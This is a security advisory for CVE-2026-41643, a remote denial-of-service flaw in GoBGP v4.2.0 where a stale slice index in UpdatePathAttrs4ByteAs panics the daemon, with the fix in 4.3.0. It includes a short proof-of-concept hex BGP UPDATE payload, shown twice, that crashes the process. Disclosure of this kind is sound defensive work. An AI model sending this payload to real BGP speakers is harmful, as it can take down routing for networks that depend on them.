GHSA-8RXH-R2P6-7F2Q
Vulnerability from github – Published: 2026-04-29 20:44 – Updated: 2026-05-08 20:42Summary
A remote Denial of Service (DoS) vulnerability exists in GoBGP where a malformed BGP UPDATE message can trigger a runtime error: index out of range panic. This occurs during the processing of 4-byte AS attributes when the message structure causes an internal slice index shift that is not properly handled.
Details
The vulnerability is located in internal/pkg/table/message.go within the UpdatePathAttrs4ByteAs function.
When GoBGP processes a BGP UPDATE message containing both an AS_PATH and an AS4_PATH attribute, it attempts to merge or validate them to support 4-byte AS numbers. If the attributes are ordered such that AS4_PATH (Type 17) appears before AS_PATH (Type 2), and the AS4_PATH is deemed invalid/malformed, the code attempts to remove the AS4_PATH attribute from the msg.PathAttributes slice. It appears the crash happens due to an index shift in msg.PathAttributes:
#GoBGP v4.2.0
// Line 112: If AS4_PATH precedes AS_PATH, the deletion causes all subsequent attributes to shift left.
msg.PathAttributes = append(msg.PathAttributes[:as4AttrPos], msg.PathAttributes[as4AttrPos+1:]...)
// Line 206: The stale asAttrPos index is used here.
//The function continues to use the stale index (asAttrPos) to update the AS_PATH. Since the slice length has decreased, accessing the old index leads to a panic.
msg.PathAttributes[asAttrPos] = bgp.NewPathAttributeAsPath(newIntfParams)
This deletion causes all subsequent attributes in the slice to shift left by one position. However, the function continues to use the original asAttrPos index (calculated before the deletion) to access or modify the AS_PATH attribute later at Line 206. Because the slice is now shorter, the "stale" index points out of bounds, triggering a panic and crashing the entire GoBGP process.
PoC
Environment: * GoBGP version: 4.2.0 Configuration: Passive peering enabled. Reproduction Steps: Configure GoBGP with a neighbor (e.g., 192.168.31.195). Send a specially crafted BGP UPDATE hex payload:
ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff
00 22 02
00 00 # Withdrawn Routes Length
00 0b # Total Path Attribute Length
40 11 01 02 # AS4_PATH (Type 17, Len 1, Val 02) - Triggers the bug
40 02 04 ff ff de ad # AS_PATH (Type 2, Len 4)
The GoBGP process will immediately crash with: panic: runtime error: index out of range [1] with length 1.
Impact
Vulnerability Type: Remote Denial of Service (DoS). Impacted Users: Any GoBGP deployment (v4.2.0 and earlier) that accepts BGP UPDATE messages from peers. Since this crash occurs in the FSM (Finite State Machine) handling loop, a single malicious peer or a malformed route propagated through a transit provider can consistently crash the BGP daemon, leading to a complete loss of routing capabilities.
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 4.2.0"
},
"package": {
"ecosystem": "Go",
"name": "github.com/osrg/gobgp/v4"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "4.3.0"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2026-41643"
],
"database_specific": {
"cwe_ids": [
"CWE-129"
],
"github_reviewed": true,
"github_reviewed_at": "2026-04-29T20:44:04Z",
"nvd_published_at": "2026-05-07T12:16:17Z",
"severity": "HIGH"
},
"details": "### Summary\nA remote Denial of Service (DoS) vulnerability exists in GoBGP where a malformed BGP UPDATE message can trigger a runtime error: index out of range panic. This occurs during the processing of 4-byte AS attributes when the message structure causes an internal slice index shift that is not properly handled.\n\n### Details\nThe vulnerability is located in internal/pkg/table/message.go within the UpdatePathAttrs4ByteAs function.\n\nWhen GoBGP processes a BGP UPDATE message containing both an AS_PATH and an AS4_PATH attribute, it attempts to merge or validate them to support 4-byte AS numbers. If the attributes are ordered such that AS4_PATH (Type 17) appears before AS_PATH (Type 2), and the AS4_PATH is deemed invalid/malformed, the code attempts to remove the AS4_PATH attribute from the msg.PathAttributes slice.\nIt appears the crash happens due to an index shift in msg.PathAttributes:\n```\n#GoBGP v4.2.0\n// Line 112: If AS4_PATH precedes AS_PATH, the deletion causes all subsequent attributes to shift left.\nmsg.PathAttributes = append(msg.PathAttributes[:as4AttrPos], msg.PathAttributes[as4AttrPos+1:]...)\n\n// Line 206: The stale asAttrPos index is used here.\n//The function continues to use the stale index (asAttrPos) to update the AS_PATH. Since the slice length has decreased, accessing the old index leads to a panic.\nmsg.PathAttributes[asAttrPos] = bgp.NewPathAttributeAsPath(newIntfParams)\n```\nThis deletion causes all subsequent attributes in the slice to shift left by one position. However, the function continues to use the original asAttrPos index (calculated before the deletion) to access or modify the AS_PATH attribute later at [Line 206](https://www.google.com/search?q=https://github.com/osrg/gobgp/blob/v4.2.0/internal/pkg/table/message.go%23L206). Because the slice is now shorter, the \"stale\" index points out of bounds, triggering a panic and crashing the entire GoBGP process.\n### PoC\nEnvironment: * GoBGP version: 4.2.0\nConfiguration: Passive peering enabled.\nReproduction Steps:\nConfigure GoBGP with a neighbor (e.g., 192.168.31.195).\nSend a specially crafted BGP UPDATE hex payload:\n```\nff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff\n00 22 02\n00 00 # Withdrawn Routes Length\n00 0b # Total Path Attribute Length\n40 11 01 02 # AS4_PATH (Type 17, Len 1, Val 02) - Triggers the bug\n40 02 04 ff ff de ad # AS_PATH (Type 2, Len 4)\n```\nThe GoBGP process will immediately crash with: panic: runtime error: index out of range [1] with length 1.\n\n### Impact\nVulnerability Type: Remote Denial of Service (DoS).\nImpacted Users: Any GoBGP deployment (v4.2.0 and earlier) that accepts BGP UPDATE messages from peers. Since this crash occurs in the FSM (Finite State Machine) handling loop, a single malicious peer or a malformed route propagated through a transit provider can consistently crash the BGP daemon, leading to a complete loss of routing capabilities.",
"id": "GHSA-8rxh-r2p6-7f2q",
"modified": "2026-05-08T20:42:30Z",
"published": "2026-04-29T20:44:04Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/osrg/gobgp/security/advisories/GHSA-8rxh-r2p6-7f2q"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-41643"
},
{
"type": "PACKAGE",
"url": "https://github.com/osrg/gobgp"
},
{
"type": "WEB",
"url": "https://github.com/osrg/gobgp/releases/tag/v4.3.0"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
],
"summary": "GoBGP has Remote Denial of Service (Panic) in UpdatePathAttrs4ByteAs via Malformed BGP UPDATE"
}
Sightings
| Author | Source | Type | Date | Other |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.